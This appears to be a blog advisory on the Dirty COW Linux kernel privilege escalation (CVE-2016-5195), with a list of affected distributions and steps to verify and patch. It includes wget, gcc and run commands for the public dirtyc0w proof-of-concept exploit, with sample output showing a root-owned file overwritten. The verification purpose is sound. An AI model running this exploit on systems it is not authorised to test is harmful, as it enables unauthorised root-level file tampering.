A very serious security problem has been found in the Linux kernel, it’s a 0-day local privilege escalation vulnerability, which has existed for eleven years since 2005 ( since Linux kernel version 2.6.22+ ）. This bug affects all sort of of Android or Linux kernel to escalate privileges. Any users can become root in seconds.
This bug is named as Dirty COW (CVE-2016-5195). Exploitation of this bug does not leave any trace of anything abnormal happening to the logs. So you can not detect if someone has exploited this against your server.
What is CVE-2016-5195 “Dirty COW” bug?
From the project site:
A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
Here is A list of affected Linux distros (including VMs and containers that share the same kernel)
- Red Hat Enterprise Linux 7.x
- Red Hat Enterprise Linux 6.x
- Red Hat Enterprise Linux 5.x
- CentOS Linux 7.x
- CentOS Linux 6.x
- CentOS Linux 5.x
- Debian Linux wheezy
- Debian Linux jessie
- Debian Linux stretch
- Debian Linux sid
- Ubuntu Linux precise (LTS 12.04)
- Ubuntu Linux trusty
- Ubuntu Linux xenial (LTS 16.04)
- Ubuntu Linux yakkety
- Ubuntu Linux vivid/ubuntu-core
- SUSE Linux Enterprise 11 and 12.
How can I verify CVE-2016-5195 on Linux?
For RHEL/CentOS Linux, use the following script:
$ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_2.sh $ bash rh-cve-2016-5195_2.sh Your kernel is 3.10.0-123.el7.x86_64 which IS vulnerable. Red Hat recommends that you update your kernel. Alternatively, you can apply partial mitigation described at https://access.redhat.com/security/vulnerabilities/2706661 .
For all other distributions, try to run the proof of concept exploit code. Follow these steps，
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c $ gcc -lpthread dirtyc0w.c -o dirtyc0w
Then let’s create a file with privileged permission:
$ echo this is indeed a test | sudo tee linux.plus $ cat linux.plus this is indeed a test
Now let’s start the exploitation. Run the command as normal user:
$ ./dirtyc0w linux.plus m00000000000000000 mmap 7f45f50bd000 madvise 0 procselfmem 1800000000
Now if exploit successfully, the file we created with privileged permission should have been overwritten, as below:
$ cat linux.plus m00000000000000000
How to fix CVE-2016-5195 on Linux?
To upgrade the kernel, and don’t forget to commit a reboot. When you finished system updating, you can run the script rh-cve-2016-5195_2.sh to confirm everything is fine.